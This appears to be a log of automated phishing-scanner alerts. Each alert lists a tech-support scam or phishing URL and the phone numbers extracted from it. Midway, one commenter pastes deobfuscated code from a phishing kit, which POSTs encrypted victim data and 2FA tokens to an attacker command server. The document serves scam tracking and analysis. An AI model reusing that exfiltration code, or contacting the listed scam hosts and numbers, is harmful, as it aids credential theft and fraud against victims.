This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://3128.pages.dev/
Extracted Nums:
+18884003128
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://moramipharmacy.blob.core.windows.net/moramipharmacy/index.html
Extracted Nums:
N/A
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://ncvbgzbsfcdrwtgbchyqbcnhdmksuyfsvcxfsn.rest/
Extracted Nums:
+18447875856
Domain Host: GoDaddy
Domain IP: 162.241.123.127 
Carrier: Vonage
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://il3q223.pages.dev/
Extracted Nums:
+12137996062
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://www.call-support-number.com/
Extracted Nums:
+18653669022
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://www.callhelpsupport.com/
Extracted Nums:
+18608018191
Yeah silently taking info, I got the c2 server that it’s going to, was deep through a few layers of base64ing and basic client side encryption:
const makeRequest = (retryCount) => {
return new Promise((resolve, reject) => {
currentreq = $.ajax({
url: 'https://ZysPkjKyfdiPqW35Iq0hJL9GgaU3cXJ1w1BB0nWzqVqSpwLQeWHu5j.ceaja.sa.com/42557199546964580RNGvlJVaylAVWSZMQJTJNDLWURCNONBAZOSHLUDZRQMVNVLQQYODLJ' + randroute,
type: 'POST',
data: {data: encrypteddata},
success: function(response) {
if (response.message == "Token Not Found" && retryCount < 3) {
console.log('data: '+formattedargs);
setTimeout(function(){
resolve(makeRequest(retryCount + 1));
}, 3000);
}
if (response.message == "Missing Value") {
resolve('missing value');
}
if (response.message !== "Token Not Found") {
let decryptedresp = JSON.parse(decryptData(response));
if(route !== "twofaselected"){
if (decryptedresp.token) {
token = decryptedresp.token;
}
}
if (decryptedresp.message == "Token Not Found" && retryCount < 3) {
console.log('data: '+formattedargs);
setTimeout(function(){
resolve(makeRequest(retryCount + 1));
}, 3000);
} else {
// console.log(decryptedresp);
requestsent = false;
resolve(decryptedresp);
}
}
},
error: function(xhr, status, error) {
requestsent = false;
console.error('Error:', error);
reject(error);
}
});
});
};
return makeRequest(0);
}
};
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://appleweb.pages.dev/
Extracted Nums:
+15734272835
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://applecybercop.pages.dev/
Extracted Nums:
+18554443340
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://dwefdz.pages.dev/
Extracted Nums:
+12137996062
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://jjadfj.pages.dev/
Extracted Nums:
+18884003128
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: http://market.dratassianaalves.com.br/
Extracted Nums:
N/A
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://antpb1btnrcf7qcq88bwbyqjq8pxni0zyurik.dratassianaalves.com.br/
Extracted Nums:
N/A
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://afdwqqad.pages.dev/
Extracted Nums:
+12137996062
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://5ejs50p1rcogbxp3qpij4rly3tldo6xsdn9zq.dratassianaalves.com.br/
Extracted Nums:
N/A
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: http://www.ilgvb99ojobncvcmjibaxrdi1o5vywxe996kg.dratassianaalves.com.br/
Extracted Nums:
N/A
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://www.wndoaylvjcvginisi54mraavgpeoafbcxvhot.dratassianaalves.com.br/
Extracted Nums:
N/A
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://jhggy.pages.dev/
Extracted Nums:
+12137996062
This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.
URL: https://wrfwqcaw.pages.dev/
Extracted Nums:
+18086462285
